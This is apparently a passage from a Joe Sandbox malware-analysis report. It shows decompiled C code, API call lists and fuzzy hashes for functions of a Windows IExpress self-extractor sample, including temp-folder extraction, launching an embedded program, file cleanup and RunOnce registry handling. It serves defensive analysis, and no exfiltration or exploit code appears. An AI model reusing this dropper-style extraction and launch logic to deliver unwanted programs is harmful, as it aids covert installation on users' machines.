					if(_t67 != 0) {
						__eflags =  *0x788b0; // 0x2
						if(__eflags != 0) {
							 *0x781e4 = _t58;
							goto L13;
						} else {
							 *0x788b0 = _t58;
							_t37 = E00076C3F(0x710b8, 0x710c4); // executed
							__eflags = _t37;
							if(__eflags == 0) {
								goto L13;
							} else {
								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
								_t30 = 0xff;
							}
						}
					} else {
						_push(0x1f);
						L00076FF4();
						L13:
						_t68 =  *0x788b0 - _t58; // 0x2
						if(_t68 == 0) {
							_push(0x710b4);
							_push(0x710ac);
							L00077202();
							 *0x788b0 = 2;
						}
						if(_t53 == 0) {
							 *0x788ac = 0;
						}
						_t71 =  *0x788b4;
						if( *0x788b4 != 0 && E00077060(_t71, 0x788b4) != 0) {
							_t60 =  *0x788b4; // 0x0
							 *0x7a288(0, 2, 0);
							 *_t60();
						}
						_t25 = __imp___acmdln; // 0x777d5b9c
						_t59 =  *_t25;
						 *(_t62 - 0x1c) = _t59;
						_t54 =  *(_t62 - 0x20);
						while(1) {
							_t41 =  *_t59;
							if(_t41 > 0x20) {
								goto L32;
							}
							if(_t41 != 0) {
								if(_t54 != 0) {
									goto L32;
								} else {
									while(_t41 != 0 && _t41 <= 0x20) {
										_t59 = _t59 + 1;
										 *(_t62 - 0x1c) = _t59;
										_t41 =  *_t59;
									}
								}
							}
							__eflags =  *(_t62 - 0x3c) & 0x00000001;
							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
								_t29 = 0xa;
							} else {
								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
							}
							_push(_t29);
							_t30 = E00072BFB(0x70000, 0, _t59); // executed
							 *0x781e0 = _t30;
							__eflags =  *0x781f8;
							if( *0x781f8 == 0) {
								exit(_t30); // executed
								goto L32;
							}
							__eflags =  *0x781e4;
							if( *0x781e4 == 0) {
								__imp___cexit();
								_t30 =  *0x781e0; // 0x80070002
							}
							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
							goto L40;
							L32:
							__eflags = _t41 - 0x22;
							if(_t41 == 0x22) {
								__eflags = _t54;
								_t15 = _t54 == 0;
								__eflags = _t15;
								_t54 = 0 | _t15;
								 *(_t62 - 0x20) = _t54;
							}
							_t26 = _t41 & 0x000000ff;
							__imp___ismbblead(_t26);
							__eflags = _t26;
							if(_t26 != 0) {
								_t59 = _t59 + 1;
								__eflags = _t59;
								 *(_t62 - 0x1c) = _t59;
							}
							_t59 = _t59 + 1;
							 *(_t62 - 0x1c) = _t59;
						}
					}
					L40:
					return E0007724D(_t30);
				}
				_t58 = 1;
				__eflags = 1;
				goto L7;
			}

0x00076a60
0x00076a6a
0x00076a6c
0x00076a71
0x00076a78
0x00076a7f
0x00076a85
0x00076a8e
0x00076a91
0x00076a93
0x00076a9c
0x00076aa2
0x00000000
0x00000000
0x00076aa6
0x00076ab4
0x00000000
0x00076aa8
0x00076aaa
0x00076aab
0x00076aab
0x00076abf
0x00076abf
0x00076ac5
0x00076ad1
0x00076ad7
0x00076b05
0x00000000
0x00076ad9
0x00076ad9
0x00076ae9
0x00076af0
0x00076af2
0x00000000
0x00076af4
0x00076af4
0x00076afb
0x00076afb
0x00076af2
0x00076ac7
0x00076ac7
0x00076ac9
0x00076b0b
0x00076b0b
0x00076b11
0x00076b13
0x00076b18
0x00076b1d
0x00076b24
0x00076b24
0x00076b30
0x00076b39
0x00076b39
0x00076b3b
0x00076b42
0x00076b57
0x00076b5f
0x00076b65
0x00076b65
0x00076b67
0x00076b6c
0x00076b6e
0x00076b71
0x00076b74
0x00076b74
0x00076b79
0x00000000
0x00000000
0x00076b7d
0x00076b81
0x00000000
0x00000000
0x00076b83
0x00076b8c
0x00076b8d
0x00076b90
0x00076b90
0x00076b83
0x00076b81
0x00076b94
0x00076b98
0x00076ba2
0x00076b9a
0x00076b9a
0x00076b9a
0x00076ba3
0x00076bab
0x00076bb0
0x00076bb5
0x00076bbc
0x00076bbf
0x00000000
0x00076bbf
0x00076c1e
0x00076c25
0x00076c27
0x00076c2d
0x00076c2d
0x00076c32
0x00000000
0x00076bc5
0x00076bc5
0x00076bc8
0x00076bcc
0x00076bce
0x00076bce
0x00076bd1
0x00076bd3
0x00076bd3
0x00076bd6
0x00076bda
0x00076be1
0x00076be3
0x00076be5
0x00076be5
0x00076be6
0x00076be6
0x00076be9
0x00076bea
0x00076bea
0x00076b74
0x00076c39
0x00076c3e
0x00076c3e
0x00076abe
0x00076abe
0x00000000

APIs

Part of subcall function 00077155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00077182
Part of subcall function 00077155: GetCurrentProcessId.KERNEL32 ref: 00077191
Part of subcall function 00077155: GetCurrentThreadId.KERNEL32 ref: 0007719A
Part of subcall function 00077155: GetTickCount.KERNEL32 ref: 000771A3
Part of subcall function 00077155: QueryPerformanceCounter.KERNEL32(?), ref: 000771B8

GetStartupInfoW.KERNEL32(?,000772B8,00000058), ref: 00076A7F
Sleep.KERNEL32(000003E8), ref: 00076AB4
_amsg_exit.MSVCRT ref: 00076AC9
_initterm.MSVCRT ref: 00076B1D
__IsNonwritableInCurrentImage.LIBCMT ref: 00076B49
exit.KERNELBASE ref: 00076BBF
_ismbblead.MSVCRT ref: 00076BDA

Memory Dump Source

Source File: 00000001.00000002.312910074.0000000000071000.00000020.00000001.01000000.00000004.sdmp, Offset: 00070000, based on PE: true

Associated: 00000001.00000002.312903122.0000000000070000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312921480.0000000000078000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_70000_niba6073.jbxd

Similarity

API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
String ID:
API String ID: 836923961-0
Opcode ID: 314d9ea7782bc3982d7bc0e6ce69bc26504a3c2a36fdf274aac1c4a5e798e619
Instruction ID: 0506b879e081538a63b5c8cc9a4b022a295808ff0f766db6898b8e22ea51a2e0
Opcode Fuzzy Hash: 314d9ea7782bc3982d7bc0e6ce69bc26504a3c2a36fdf274aac1c4a5e798e619
Instruction Fuzzy Hash: CC412870D44B14DBEBA19B68DC087AD37E4AB45320F54C01AE90FE7291CF7D48C18B8A

Uniqueness

Uniqueness Score: -1.00%

Function 000758C8 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 74
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E000758C8(intOrPtr* __ecx) {
				void* _v8;
				intOrPtr _t6;
				void* _t10;
				void* _t12;
				void* _t14;
				signed char _t16;
				void* _t20;
				void* _t23;
				intOrPtr* _t27;
				CHAR* _t33;

				_push(__ecx);
				_t33 = __ecx;
				_t27 = __ecx;
				_t23 = __ecx + 1;
				do {
					_t6 =  *_t27;
					_t27 = _t27 + 1;
				} while (_t6 != 0);
				_t36 = _t27 - _t23 + 0x14;
				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
				if(_t20 != 0) {
					E00071680(_t20, _t36, _t33);
					E0007658A(_t20, _t36, "TMP4351$.TMP");
					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
					_v8 = _t10;
					LocalFree(_t20);
					_t12 = _v8;
					if(_t12 == 0xffffffff) {
						goto L4;
					} else {
						CloseHandle(_t12);
						_t16 = GetFileAttributesA(_t33); // executed
						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
							goto L4;
						} else {
							 *0x79124 = 0;
							_t14 = 1;
						}
					}
				} else {
					E000744B9(0, 0x4b5, 0, 0, 0x10, 0);
					L4:
					 *0x79124 = E00076285();
					_t14 = 0;
				}
				return _t14;
			}

0x000758cd
0x000758d1
0x000758d3
0x000758d5
0x000758d8
0x000758d8
0x000758da
0x000758db
0x000758e1
0x000758ed
0x000758f1
0x0007591e
0x0007592c
0x00075943
0x0007594a
0x0007594d
0x00075953
0x00075959
0x00000000
0x0007595b
0x0007595c
0x00075963
0x0007596c
0x00000000
0x00075972
0x00075974
0x0007597a
0x0007597a
0x0007596c
0x000758f3
0x00075901
0x00075906
0x0007590b
0x00075910
0x00075910
0x00075918

APIs

LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00075534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 000758E7
CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00075534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00075943
LocalFree.KERNEL32(00000000,?,00075534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0007594D
CloseHandle.KERNEL32(00000000,?,00075534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0007595C
GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00075534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00075963

Strings

TMP4351$.TMP, xrefs: 00075923
C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 000758CD, 000758CF, 00075919, 00075962

Memory Dump Source

Source File: 00000001.00000002.312910074.0000000000071000.00000020.00000001.01000000.00000004.sdmp, Offset: 00070000, based on PE: true

Associated: 00000001.00000002.312903122.0000000000070000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312921480.0000000000078000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_70000_niba6073.jbxd

Similarity

API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$TMP4351$.TMP
API String ID: 747627703-2560997688
Opcode ID: 217d26e1e925edf83afd0f4a28e054913170102f8bca0e16be52c2914287cf0e
Instruction ID: 899f19b123e23bea3b4628dd874354d95753b39c78e86071a58c9e56de2df665
Opcode Fuzzy Hash: 217d26e1e925edf83afd0f4a28e054913170102f8bca0e16be52c2914287cf0e
Instruction Fuzzy Hash: 1E112671F0061167E7201F795C0DADB7E99EF86361B108A15B60EE31C1CABC984582A8

Uniqueness

Uniqueness Score: -1.00%

Function 00073FEF Relevance: 10.6, APIs: 7, Instructions: 97
processsynchronizationwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E00073FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
				signed int _v8;
				char _v524;
				long _v528;
				struct _PROCESS_INFORMATION _v544;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t20;
				void* _t22;
				int _t25;
				intOrPtr* _t39;
				signed int _t44;
				void* _t49;
				signed int _t50;
				intOrPtr _t53;

				_t45 = __edx;
				_t20 =  *0x78004; // 0xa87cf02e
				_v8 = _t20 ^ _t50;
				_t39 = __ecx;
				_t49 = 1;
				_t22 = 0;
				if(__ecx == 0) {
					L13:
					return E00076CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
				}
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
				if(_t25 == 0) {
					 *0x79124 = E00076285();
					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0); // executed
					_t45 = 0x4c4;
					E000744B9(0, 0x4c4, _t39,  &_v524, 0x10, 0); // executed
					L11:
					_t49 = 0;
					L12:
					_t22 = _t49;
					goto L13;
				}
				WaitForSingleObject(_v544.hProcess, 0xffffffff);
				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
				_t44 = _v528;
				_t53 =  *0x78a28; // 0x0
				if(_t53 == 0) {
					_t34 =  *0x79a2c; // 0x0
					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
						_t34 = _t44 & 0xff000000;
						if((_t44 & 0xff000000) == 0xaa000000) {
							 *0x79a2c = _t44;
						}
					}
				}
				E0007411B(_t34, _t44);
				CloseHandle(_v544.hThread);
				CloseHandle(_v544);
				if(( *0x79a34 & 0x00000400) == 0 || _v528 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x00073fef
0x00073ffa
0x00074001
0x00074008
0x0007400a
0x0007400b
0x00074010
0x0007410a
0x0007411a
0x0007411a
0x0007401c
0x0007401d
0x0007401e
0x0007401f
0x00074033
0x0007403b
0x000740ca
0x000740e9
0x000740f8
0x00074101
0x00074106
0x00074106
0x00074108
0x00074108
0x00000000
0x00074108
0x00074049
0x0007405c
0x00074062
0x00074068
0x0007406e
0x00074070
0x00074077
0x0007407f
0x00074089
0x0007408b
0x0007408b
0x00074089
0x00074077
0x00074091
0x0007409c
0x000740a8
0x000740b8
0x00000000
0x000740c2
0x00000000
0x000740c2

APIs

CreateProcessA.KERNELBASE ref: 00074033
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00074049
GetExitCodeProcess.KERNELBASE ref: 0007405C
CloseHandle.KERNEL32(?), ref: 0007409C
CloseHandle.KERNEL32(?), ref: 000740A8
GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 000740DC
FormatMessageA.KERNELBASE(00001000,00000000,00000000), ref: 000740E9

Memory Dump Source

Source File: 00000001.00000002.312910074.0000000000071000.00000020.00000001.01000000.00000004.sdmp, Offset: 00070000, based on PE: true

Associated: 00000001.00000002.312903122.0000000000070000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312921480.0000000000078000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_70000_niba6073.jbxd

Similarity

API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
String ID:
API String ID: 3183975587-0
Opcode ID: 304a6265495e18b9a12237420447cf19aac330b9a515b9acedb98b35ece9263f
Instruction ID: 44ebbf4f868554ae1f2fba35d3ed73a351cf1428e6a9f9966f8e960d3edf347b
Opcode Fuzzy Hash: 304a6265495e18b9a12237420447cf19aac330b9a515b9acedb98b35ece9263f
Instruction Fuzzy Hash: 45318D31E41208ABFB609B65DC48FAA77B8EB95701F1081A9F60DE2161C73C5CC18AA5

Uniqueness

Uniqueness Score: -1.00%

Function 000751E5 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 74
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E000751E5(void* __eflags) {
				int _t5;
				void* _t6;
				void* _t28;

				_t1 = E0007468F("UPROMPT", 0, 0) + 1; // 0x1
				_t28 = LocalAlloc(0x40, _t1);
				if(_t28 != 0) {
					if(E0007468F("UPROMPT", _t28, _t29) != 0) {
						_t5 = lstrcmpA(_t28, "<None>"); // executed
						if(_t5 != 0) {
							_t6 = E000744B9(0, 0x3e9, _t28, 0, 0x20, 4);
							LocalFree(_t28);
							if(_t6 != 6) {
								 *0x79124 = 0x800704c7;
								L10:
								return 0;
							}
							 *0x79124 = 0;
							L6:
							return 1;
						}
						LocalFree(_t28);
						goto L6;
					}
					E000744B9(0, 0x4b1, 0, 0, 0x10, 0);
					LocalFree(_t28);
					 *0x79124 = 0x80070714;
					goto L10;
				}
				E000744B9(0, 0x4b5, 0, 0, 0x10, 0);
				 *0x79124 = E00076285();
				goto L10;
			}

0x000751fb
0x00075207
0x0007520b
0x0007523c
0x00075268
0x00075270
0x0007528b
0x00075293
0x0007529c
0x000752a6
0x000752b0
0x00000000
0x000752b0
0x0007529e
0x00075279
0x00000000
0x0007527b
0x00075273
0x00000000
0x00075273
0x0007524a
0x00075250
0x00075256
0x00000000
0x00075256
0x00075219
0x00075223
0x00000000

APIs

Part of subcall function 0007468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000746A0
Part of subcall function 0007468F: SizeofResource.KERNEL32(00000000,00000000,?,00072D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000746A9
Part of subcall function 0007468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000746C3
Part of subcall function 0007468F: LoadResource.KERNEL32(00000000,00000000,?,00072D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000746CC
Part of subcall function 0007468F: LockResource.KERNEL32(00000000,?,00072D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000746D3
Part of subcall function 0007468F: memcpy_s.MSVCRT ref: 000746E5
Part of subcall function 0007468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000746EF

LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00072F4D,?,00000002,00000000), ref: 00075201
LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00075250

Part of subcall function 000744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00074518
Part of subcall function 000744B9: MessageBoxA.USER32(?,?,siga30,00010010), ref: 00074554

Part of subcall function 00076285: GetLastError.KERNEL32(00075BBC), ref: 00076285

Strings

<None>, xrefs: 00075262
UPROMPT, xrefs: 000751EF, 00075230

Memory Dump Source

Source File: 00000001.00000002.312910074.0000000000071000.00000020.00000001.01000000.00000004.sdmp, Offset: 00070000, based on PE: true

Associated: 00000001.00000002.312903122.0000000000070000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312921480.0000000000078000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_70000_niba6073.jbxd

Similarity

API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
String ID: <None>$UPROMPT
API String ID: 957408736-2980973527
Opcode ID: 99424b6ace067c4dc80930e876cb1669175a6ebd5e4ad5070652bb0ceb0e73a5
Instruction ID: d4ff433de2dfd319ec3ca6404269b949666888102c51efeb2defe6bbc2628ddf
Opcode Fuzzy Hash: 99424b6ace067c4dc80930e876cb1669175a6ebd5e4ad5070652bb0ceb0e73a5
Instruction Fuzzy Hash: 6A11E6B1F006016BF3646B715C45FBF61DDEBCA341B50C429B60EE61D2EABD8C42516D

Uniqueness

Uniqueness Score: -1.00%

Function 000752B6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65
fileCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E000752B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				char _v268;
				signed int _t9;
				signed int _t11;
				void* _t21;
				void* _t29;
				CHAR** _t31;
				void* _t32;
				signed int _t33;

				_t28 = __edi;
				_t22 = __ecx;
				_t21 = __ebx;
				_t9 =  *0x78004; // 0xa87cf02e
				_v8 = _t9 ^ _t33;
				_push(__esi);
				_t31 =  *0x791e0; // 0x29e7cd0
				if(_t31 != 0) {
					_push(__edi);
					do {
						_t29 = _t31;
						if( *0x78a24 == 0 &&  *0x79a30 == 0) {
							SetFileAttributesA( *_t31, 0x80); // executed
							DeleteFileA( *_t31); // executed
						}
						_t31 = _t31[1];
						LocalFree( *_t29);
						LocalFree(_t29);
					} while (_t31 != 0);
					_pop(_t28);
				}
				_t11 =  *0x78a20; // 0x0
				_pop(_t32);
				if(_t11 != 0 &&  *0x78a24 == 0 &&  *0x79a30 == 0) {
					_push(_t22);
					E00071781( &_v268, 0x104, _t22, "C:\Users\engineer\AppData\Local\Temp\IXP001.TMP\");
					if(( *0x79a34 & 0x00000020) != 0) {
						E000765E8( &_v268);
					}
					SetCurrentDirectoryA(".."); // executed
					_t22 =  &_v268;
					E00072390( &_v268);
					_t11 =  *0x78a20; // 0x0
				}
				if( *0x79a40 != 1 && _t11 != 0) {
					_t11 = E00071FE1(_t22); // executed
				}
				 *0x78a20 =  *0x78a20 & 0x00000000;
				return E00076CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
			}

0x000752b6
0x000752b6
0x000752b6
0x000752c1
0x000752c8
0x000752cb
0x000752cc
0x000752d4
0x000752d6
0x000752d7
0x000752de
0x000752e0
0x000752f2
0x000752fa
0x000752fa
0x00075302
0x00075305
0x0007530c
0x00075312
0x00075316
0x00075316
0x00075317
0x0007531c
0x0007531f
0x00075333
0x00075345
0x00075351
0x00075359
0x00075359
0x00075363
0x00075369
0x0007536f
0x00075374
0x00075374
0x00075381
0x00075387
0x00075387
0x0007538f
0x000753a0

APIs

SetFileAttributesA.KERNELBASE(029E7CD0,00000080,?,00000000), ref: 000752F2
DeleteFileA.KERNELBASE(029E7CD0), ref: 000752FA
LocalFree.KERNEL32(029E7CD0,?,00000000), ref: 00075305
LocalFree.KERNEL32(029E7CD0), ref: 0007530C
SetCurrentDirectoryA.KERNELBASE(000711FC,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 00075363

Strings

C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00075334

Memory Dump Source

Source File: 00000001.00000002.312910074.0000000000071000.00000020.00000001.01000000.00000004.sdmp, Offset: 00070000, based on PE: true

Associated: 00000001.00000002.312903122.0000000000070000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312921480.0000000000078000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_70000_niba6073.jbxd

Similarity

API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
API String ID: 2833751637-3699071305
Opcode ID: 35d8b58b58e0d80d5bc772e3cc4c1a96722ffdce6f079d541ffa361dbe95380c
Instruction ID: a46b1480ac1249e938496dee0b07d5622f7e5757bbd6631af6bdbbe8e038f6ae
Opcode Fuzzy Hash: 35d8b58b58e0d80d5bc772e3cc4c1a96722ffdce6f079d541ffa361dbe95380c
Instruction Fuzzy Hash: 5421BE31E01A04EBFB609B24DC09BA937B0BB44352F048569E84E661B1CBFD5EC4CB89

Uniqueness

Uniqueness Score: -1.00%

Function 00071FE1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00071FE1(void* __ecx) {
				void* _v8;
				long _t4;

				if( *0x78530 != 0) {
					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
					if(_t4 == 0) {
						RegDeleteValueA(_v8, "wextract_cleanup1"); // executed
						return RegCloseKey(_v8);
					}
				}
				return _t4;
			}

0x00071fee
0x00072005
0x0007200d
0x00072017
0x00000000
0x00072020
0x0007200d
0x00072029

APIs

RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,0007538C,?,?,0007538C), ref: 00072005
RegDeleteValueA.KERNELBASE(0007538C,wextract_cleanup1,?,?,0007538C), ref: 00072017
RegCloseKey.ADVAPI32(0007538C,?,?,0007538C), ref: 00072020

Strings

wextract_cleanup1, xrefs: 00071FE7, 0007200F
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00071FFB

Memory Dump Source

Source File: 00000001.00000002.312910074.0000000000071000.00000020.00000001.01000000.00000004.sdmp, Offset: 00070000, based on PE: true

Associated: 00000001.00000002.312903122.0000000000070000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312921480.0000000000078000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_70000_niba6073.jbxd

Similarity

API ID: CloseDeleteOpenValue
String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup1
API String ID: 849931509-1592051331
Opcode ID: d5b7e6b09dc894a01666a83bed7c9837fb5dd9a6c817bcb1a9c2dfea1267ea49
Instruction ID: 28a69df718dccc3390d269e20979b7bf82d26589336b413ca9648affac54e4cc
Opcode Fuzzy Hash: d5b7e6b09dc894a01666a83bed7c9837fb5dd9a6c817bcb1a9c2dfea1267ea49
Instruction Fuzzy Hash: E6E04F34E90318FBEB218B90EC0EF5E7BA9F741785F104198BA0CB0061EB6D5A94D799

Uniqueness

Uniqueness Score: -1.00%

Function 00074CD0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 146
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00074CD0(char* __edx, long _a4, int _a8) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				int _t30;
				long _t32;
				signed int _t33;
				long _t35;
				long _t36;
				struct HWND__* _t37;
				long _t38;
				long _t39;
				long _t41;
				long _t44;
				long _t45;
				long _t46;
				signed int _t50;
				long _t51;
				char* _t58;
				long _t59;
				char* _t63;
				long _t64;
				CHAR* _t71;
				CHAR* _t74;
				int _t75;
				signed int _t76;

				_t69 = __edx;
				_t29 =  *0x78004; // 0xa87cf02e
				_t30 = _t29 ^ _t76;
				_v8 = _t30;
				_t75 = _a8;
				if( *0x791d8 == 0) {
					_t32 = _a4;
					__eflags = _t32;
					if(_t32 == 0) {
						_t33 = E00074E99(_t75);
						L35:
						return E00076CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
					}
					_t35 = _t32 - 1;
					__eflags = _t35;
					if(_t35 == 0) {
						L9:
						_t33 = 0;
						goto L35;
					}
					_t36 = _t35 - 1;
					__eflags = _t36;
					if(_t36 == 0) {
						_t37 =  *0x78584; // 0x0
						__eflags = _t37;
						if(_t37 != 0) {
							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
						}
						_t54 = 0x791e4;
						_t58 = 0x791e4;
						do {
							_t38 =  *_t58;
							_t58 =  &(_t58[1]);
							__eflags = _t38;
						} while (_t38 != 0);
						_t59 = _t58 - 0x791e5;
						__eflags = _t59;
						_t71 =  *(_t75 + 4);
						_t73 =  &(_t71[1]);
						do {
							_t39 =  *_t71;
							_t71 =  &(_t71[1]);
							__eflags = _t39;
						} while (_t39 != 0);
						_t69 = _t71 - _t73;
						_t30 = _t59 + 1 + _t71 - _t73;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							L3:
							_t33 = _t30 | 0xffffffff;
							goto L35;
						}
						_t69 = 0x791e4;
						_t30 = E00074702( &_v268, 0x791e4,  *(_t75 + 4));
						__eflags = _t30;
						if(__eflags == 0) {
							goto L3;
						}
						_t41 = E0007476D( &_v268, __eflags);
						__eflags = _t41;
						if(_t41 == 0) {
							goto L9;
						}
						_push(0x180);
						_t30 = E00074980( &_v268, 0x8302); // executed
						_t75 = _t30;
						__eflags = _t75 - 0xffffffff;
						if(_t75 == 0xffffffff) {
							goto L3;
						}
						_t30 = E000747E0( &_v268);
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						 *0x793f4 =  *0x793f4 + 1;
						_t33 = _t75;
						goto L35;
					}
					_t44 = _t36 - 1;
					__eflags = _t44;
					if(_t44 == 0) {
						_t54 = 0x791e4;
						_t63 = 0x791e4;
						do {
							_t45 =  *_t63;
							_t63 =  &(_t63[1]);
							__eflags = _t45;
						} while (_t45 != 0);
						_t74 =  *(_t75 + 4);
						_t64 = _t63 - 0x791e5;
						__eflags = _t64;
						_t69 =  &(_t74[1]);
						do {
							_t46 =  *_t74;
							_t74 =  &(_t74[1]);
							__eflags = _t46;
						} while (_t46 != 0);
						_t73 = _t74 - _t69;
						_t30 = _t64 + 1 + _t74 - _t69;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							goto L3;
						}
						_t69 = 0x791e4;
						_t30 = E00074702( &_v268, 0x791e4,  *(_t75 + 4));
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						_t69 =  *((intOrPtr*)(_t75 + 0x18));
						_t30 = E00074C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						E00074B60( *((intOrPtr*)(_t75 + 0x14))); // executed
